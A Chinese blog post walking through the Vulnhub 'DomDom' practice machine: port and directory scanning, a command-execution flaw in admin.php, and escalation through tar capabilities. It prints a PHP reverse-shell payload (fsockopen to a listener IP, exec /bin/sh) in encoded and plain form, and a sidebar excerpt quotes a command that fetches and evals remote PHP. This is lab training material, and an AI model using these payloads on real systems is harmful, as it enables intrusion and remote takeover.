Vulbhub-DomDom

最新推荐文章于 2024-05-30 16:08:30 发布
最新推荐文章于 2024-05-30 16:08:30 发布
阅读量146 收藏
点赞数 1
分类专栏: Vulnhub靶机 文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_62794597/article/details/129251890
版权

1、扫描局域网内存活的靶机IP

确定靶机IP为192.168.0.103

2、扫描靶机开放的端口

 

 开放了80端口web服务,我们访问靶机的网站

 

 根据网站提示这是一个登录用户的界面,我们接着扫描一下网站的目录

 

我们访问一下这三个php文件

因为靶机就开了一个80端口,因此我们只能从这三个文件中找漏洞

在一顿瞎试的情况下,找到了一个命令执行漏洞

首先我们需要在登录页面中进行抓包

 我们把/index.php/index.php 改为 /admin.php

因此我们调用利用这个漏洞进行反弹shell

我们使用php代码进行建立反弹shell,因为是post传参所以对其进行url编码

#post:
payload:php+-r+%27%24sock%3Dfsockopen%28%22192.168.31.154%22%2C8888%29%3Bexec%28%22%2Fbin%2Fsh+-i+%3C%263+%3E%263+2%3E%263%22%29%3B%27
#get:
php -r '$sock=fsockopen("192.168.0.118",9001);exec("/bin/sh -i <&3 >&3 2>&3");

 

 建立交互式环境

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看密码文件并进行提权

 

 没有suid回显,那么我们只能试试用系统内核提权

这里可以使用脏牛提权,但是我这里用新的一种查看root目录的方式,    

权限提升:Capabilities

系统管理员可以用来提高进程或二进制文件权限级别的另一种方法是“Capabilities”。Capabilities有助于在更精细的级别上管理权限

 我们可以看见/bin/tar这说明可以对文件进行读写

    

 打包完成进行解压

 

sxmmmmmmm
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Vulbhub-hackNos
wwxxss
02-25 147
接下来的思路就是先把靶机的passwd文件搞过来,在其中创建一个新用户,然后把新的passwd文件还回去即可在靶机上获取一个高权限用户。蚁剑连接后,我无法尝试反弹shell,在此我们了解到一个新工具weevely也可以进行反弹shell。蚁剑连接成功后,我们需要进行提权,首先在kali中监听端口,进行反弹shell。可以看到用户泄露,我们对admin进行解密得到其密码为admin 123。解密后还是一个加密是一个brainfuck加密,我们使用许愿星进行解密。因此我们可以进行上传马,我们使用蚁剑连接。
vulhub - SECARMY VILLAGE: GRAYHAT CONFERENCE writeup
Jiajiajiang_的博客
05-24 866
主机发现 && 端口扫描 netdiscover -i eth0 -r 192.168.154.1/24 端口扫描这次用的是threader3000 https://blog.csdn.net/Jiajiajiang_/article/details/117220625 好用 ------------------------------------------------------------ Threader 3000 - Multi-threaded.
VulbHub日记(七):Looz
Dawn_Xi的博客
09-13 249
靶机介绍 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.116 fping -aqg 192.168.56.0/24
VulbHub日记(十七):Momentum:2
Dawn_Xi的博客
11-28 2520
参考链接 Vulnhub:Momentum:2 参考博客1 参考博客2 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.139 fping -aqg 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.139 gobuster扫目录 gobuster dir -u http://192.168.56.139/ -x html,txt,php,bak --wordlist /usr/share/wordlists/di
VulnHub DC4
baynk的博客
05-18 329
0x00 靶机环境 下载地址1:https://www.vulnhub.com/entry/dc-4,313/ 下载地址2:https://pan.baidu.com/s/1VSecvfMlV7dN1-W7YlxrHg 提取码: tiwz 只有一个flag,但是给了多个切入点。 开肝。 0x01 渗透流程 nmap走起 服务端口继续扫 这次有两个端口存在,不可能ssh弱密码吧,还是先来80了。 只有这么一个登陆界面,试了SQL什么都没反应,sqlmap也一把梭过了,啥都没。通过页面的信息收集也找
react-dom.js
12-24
react-dom.js
saxon9-dom.jar
05-23
saxon9.1.0.8依赖包saxon9-dom 解决saxon9找不到saxon9-dom路径问题
vue-dom-hints:Vue devtool,用于在DOM中标识Vue组件及其SFC路径
05-01
:rocket: 安装npm i vue-dom-hints :vertical_traffic_light: 设置将其作为安装到Vue: import DomHints from 'vue-dom-hints'Vue . use ( DomHints ) 在构建中将其禁用以进行生产: if ( process . env . NODE_ENV...
markdown-it-incremental-dom:使用增量DOM的markdown-it渲染器插件
02-04
让我们看看主要功能: : 或需求 > = 4.0.0(推荐最新版本> = 8.4.0,此插件使用它) > = 0.5.x例子节点import * as IncrementalDOM from 'incremental-dom'import MarkdownIt from 'markdown-it'import ...
JavaSE-DOM视频讲解
07-22
资源名称:JavaSE-DOM视频讲解资源目录:【】01-DOM(概述)【】01-DOM(示例-新闻字体)【】01-DOM(示例-邮件列表)【】02-DOM(DOM解析的特点)【】02-DOM(示例-新闻字体2)【】02-DOM(示例-调查问卷)【】03-DOM(DOM三级...
Vulnhub靶机DOMDOM_ 1
LainWith的博客
02-04 1057
目录介绍信息收集主机发现主机信息探测测试网站命令执行-反弹shell脏牛提权方式1方式2其他提权方式参考 介绍 系列:DomDom(此系列仅此一台) 发布日期:2019年7月11日 难度:初级 Flag : 未知 学习: 靶机地址:https://www.vulnhub.com/entry/domdom-1,328/ 信息收集 主机发现 nmap -sn 192.168.40.0/24 主机信息探测 信息探测:nmap -A -p- 192.168.40.152,只开放了80等端口。 测试网站 打开网
靶机渗透日记 domdom
Anonymous
02-08 290
ip 端口 访问80端口 目录扫描 访问 /admin.php 使用 burp 抓包 将 index.php 修改成 admin.php 添加 cmd 参数,结果返回响应的信息 反弹shell name=123&username=123&password=123&access=access&cmd=php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.1..
靶机测试DomDom笔记
qq_56426046的博客
01-11 407
解决shell乱码问题,这个问题试了好久,kali上的默认shell是zsh。最后fg调出后来任务,回车得到无乱码的交互式shell。然后Ctrl+Z,把shell放到后台,在执行。本机开启个web服务,让靶机下载提权检测脚本。古有一言腰相印,谁教他、满箧婴鳞疏。登录抓包重放,发现命令执行漏洞。所以,我们先切换shell。打包用户 domom 目录。再然后获得交互shell。下载提权脚本,编译执行。
Vulnhub-DC-2靶场渗透练习
weixin_52451257的博客
11-13 3595
Vulbhub-DC2 靶场地址:DC: 2 ~ VulnHub 根据提示 需要把靶机的IP和 域名绑定 修改hosts文件 Vi /etc/hosts 靶机ip dc-2 第一步:信息收集 nmap –sS 192.168.231.0/24 nmap -A -p- 192.168.231.140 扫描目录信息, 扫描目录目前掌握 dirb,nikto,dirmap,dirsearch dirb http://192.168.231.140 nikto -h htt...
Vulnhub靶机练习——Toppo
weixin_45126664的博客
08-05 944
这是一次靶场练习,使用 kali 和 Vulnhub 的Toppo靶机 ,难度属于新手入门 ! 靶机下载地址: 1、https://download.vulnhub.com/toppo/Toppo.zip 2、https://download.vulnhub.com/toppo/Toppo.zip.torrent 知识点: 1、netdiscover发现局域网内靶机IP地址 2、nmap扫描端口、服务、漏洞 3、dirb路径扫描 4、根据发现的端口(服务),尝试相应的探测和攻击 5、cewl搜集页面关
冶炼钢铁厂热风炉发酵池煤矸石进回水无线远程温度监测
最新发布
weixin_46970383的博客
05-30 223
Modbus RTU 标准Modbus-RTU通信协议。Modbus RTU使用二进制格式传输数据,并使用串行通信协议(如RS-232或RS-485)进行数据传输。它通常用于连接不同厂家的可编程逻辑控制器(PLC)、传感器、执行器和其他自动化设备。
【TC8】如何测试IOP中PHY芯片的Llink-up time
jasonj333
05-28 91
在TC8一致性测试用例中,物理层的测试用例分为两个部分:IOP和PMA。其中IOP中对PHY芯片的Link-up时间的测试,又包含三个测试用例。这三条case从名称就能够判断出它们的不同。OABR_LINKUP_01是给DUT的对手件上电唤醒,OABR_LINKUP_02是DUT上电唤醒,OABR_LINKUP_03是DUT报文唤醒。
IP协议说明
banchengl的博客
05-28 1248
IP 指网际互连协议, Internet Protocol 的缩写,是 TCP/IP 体系中的网络层协议。设计 IP 的目的是提高网络的可扩展性:一是解决互联网问题,实现大规模、异构网络的互联互通;二是分割顶层网络应用和底层网络技术之间的耦合关系,以利于两者的独立发展。根据端到端的设计原则, IP 只为主机提供一种无连接、不可靠的、尽力而为的数据包传输服务。
使用Django实现WebSocket
Code掘金的博客
05-29 855
在Django中,WebSocket的请求由一个称为Consumer的处理器来处理。WebSocket是一种在单个TCP连接上进行全双工通信的协议,在Web开发中被广泛应用于实时通信和数据推送。以上就是使用Django实现WebSocket的简单示例,通过配置Consumer、路由和前端页面,我们可以轻松地实现基于WebSocket的实时通信功能。现在,我们已经完成了WebSocket的设置,可以运行Django应用并访问相应的页面。最后,在前端页面中使用WebSocket来建立连接并发送消息。
react-router-dom
08-02
其中,react-router-dom是基于react-router的一个包,用于在浏览器运行环境下提供路由功能。在浏览器中使用React Router时,只需要安装react-router-dom,它会自动安装react-router的依赖。你可以使用以下命令安装...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sxmmmmmmm

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值